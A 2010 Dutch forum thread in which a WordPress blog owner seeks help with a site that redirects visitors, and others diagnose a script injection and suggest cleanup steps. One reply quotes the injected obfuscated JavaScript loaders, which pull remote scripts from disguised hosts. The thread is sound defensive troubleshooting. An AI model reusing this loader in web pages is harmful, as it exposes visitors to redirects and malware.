Wordpress probleem (Virus??) - Privacy en beveiliging

donderdag 28 januari 2010 13:55

Acties:

Verwijderd

Topicstarter

Hoi mensen,

Ik heb sinds gisteren problemen met mijn website, en weet ook echt niet hoe ik dit moet oplossen en of wat ik er tegen kan/moet doen.

Het gaat erom dat de site opeens plotseling uit zichzelf opeens word doorgelinkt naar een vage link. Hij gaat in eerste instantie gewoon naar de website maar dan opeens word er een andere link geladen en zie je dit: "google-com-do.youku.com.o".

Ik dacht zelf dat het een virus was ofzo? maar heb geen idee hoe ik dit kan oplossen.

Het gaat om de volgende website: http://www.scarblog.nl bezoeken op eigen risico!

Mijn dank is groot!

Mvg
Scar
Scarblog.nl

[ Voor 4% gewijzigd door crisp op 28-01-2010 14:01 ]

donderdag 28 januari 2010 13:58

Acties:

Verwijderd

Ik heb het even bekeken met FF (met NoScript) en met Iron. Bij FF werd er niet doorgelinkt, bij Iron wel meteen. Het is dus een kwaadaardig javascript wat de bezoeker doorsluist naar een andere website. Kijk even welke javascripts er allemaal geopend worden bij het laden van de pagina.

<edit> grammaticale fout

[ Voor 5% gewijzigd door Verwijderd op 28-01-2010 14:35 ]

donderdag 28 januari 2010 13:59

Acties:

Verwijderd

Topicstarter

Hoe moet ik dat doen? Heb verder helemaal geen ervaring mee...

donderdag 28 januari 2010 14:05

Acties:

Kees

Serveradmin / BOFH / DoC

Het lijkt erop dat er op het einde twee javascripts geladen worden die de bezoeker naar die site doorsturen. Ik weet niet in hoeverre je erbij kan komen, maar ik zou toch echt even checken of je de laatste twee script tags weg kan halen.

"Een serveradmin, voluit een serveradministrator, is dan weer een slavenbeheerder oftewel een slavendrijver" - Rataplan

donderdag 28 januari 2010 14:06

Acties:

Verwijderd

Zoals Mizuki al aangeeft. Kan je met bijvoorbeeld Firefox en de NoScript addon naar je site gaan. Dan wordt je niet doorgestuurd.

Als je snel bent kan je voordat je browser wordt doorgestuurd naar die rare site nog even "Rechtermuisknop > Bron weergeven" doen op je pagina. Dit is me in ieder geval gelukt bij jou.

Helemaal onderaan je broncode staat het volgende:

HTML:

<!-- End of StatCounter Code -->
</body><script> try{window.onload=function(){document.write('<div id=megaid>wiktionary-org.sueddeutsc</div>');D9re9rrp0mg = document.getElementById('megaid').innerHTML + 'h@e@)^$.!^d&#(e@!^.^^@a$#@t^w!(@#i&k&i#)^-)#j@^$!p&&!$.&@!)p)&a!&t$##e^n)t@^#p$@i^t@)##s@#@t)()o)p$!.!$r&(u^^&^:(@D#)E&B&)U^@$!G!!/(!o)$r)#)b@)^i&&$t##(z$#@.^$@c^o#@)#m##!/^&o$(#r@)!b&)i)#)t^z)).#c!(o@m#/&g$@o!!$o()g$@$l!(#e$@).&!#)c#o((m@/&u##!s^)p!s#^.(@c^@o#)&m$^(/((w^e$!$b$.&d)$e@)/!&!('.replace(/\$|&|#|\(|@|\!|\)|\^/ig, '') ;document.write('<scr'+'ipt src=http://'+D9re9rrp0mg.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} }  catch(R5tj8zsn ) {}</script>
<!--85fbd45dcea10bf29a2a6cc126fce423-->
<script> try{window.onload=function(){document.write('<div id=megaid>google-com-do.youku.com.o</div>');Zqmedubuucvbw = document.getElementById('megaid').innerHTML + 'v)e(!)r))s#!t^o@()!c&!k)-($#c!o$#)#m((!.@@(t$)&$o((p()l!!^i!(n#(e^!@m&a(#)r)#i()#n@@e#@&.$$&r(#&@u(:&&^(&D)E(B&U#G!&&$@/&)&g@#o@^&o&g#&l^!#!@e@$.&c^^^o(@&m@#!/@!!g#o@#@^o#!(!g$(l#e^().#!c)o@!$#)m@(@#/@t)@r$a!(i@)d&#^n^!)t$!.(n&e&t#^@)/^$)t@(r)i#$#p))()a($^&d)@$v$^i^$s)!$o^^&r@^&.^@c^$#o(#m&/@!&j(e#(&u$^(#^x&&v(&i^@d!$$e^!^)o))).!#!c^)o$&^m)@/@&'.replace(/@|\^|\)|\$|\!|\(|#|&/ig, '') ;document.write('<scr'+'ipt src=http://'+Zqmedubuucvbw.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} }  catch(Kz5zx8s ) {}</script>
<!--85fbd45dcea10bf29a2a6cc126fce423-->

Dat hoort daar niet te staan gok ik..

Je gebruikt WordPress zie ik. Is je installatie een beetje up-to-date?

donderdag 28 januari 2010 14:07

Acties:

Rolfie

Backup terug zetten en de "oorzaak" oplossen. Wat het probleem precies is weet ik niet, maar meestal 1 van de onderstaande puntjes

Niet gepatche wordpress versie? Of wel niet gepatched
Een plugin bevat een foutje? Ofwel niet gepatched.
Te gemakkelijk admin wachtwoord?
[*}Gehackt FTP wachtwoord?

donderdag 28 januari 2010 14:16

Acties:

Verwijderd

Topicstarter

Ja installatie is up to date, de nieuwste versie van wordpress staat er gewoon op. Maar waar moet ik dus zoeken? gewoon in de index.php bestand? want heb hier verder helemaal geen verstand van...

mijn dank is groot!!!!

donderdag 28 januari 2010 14:24

Acties:

Verwijderd

Heb je deze site zelf opgezet? Het is een beetje gissen naar waar het exact staat..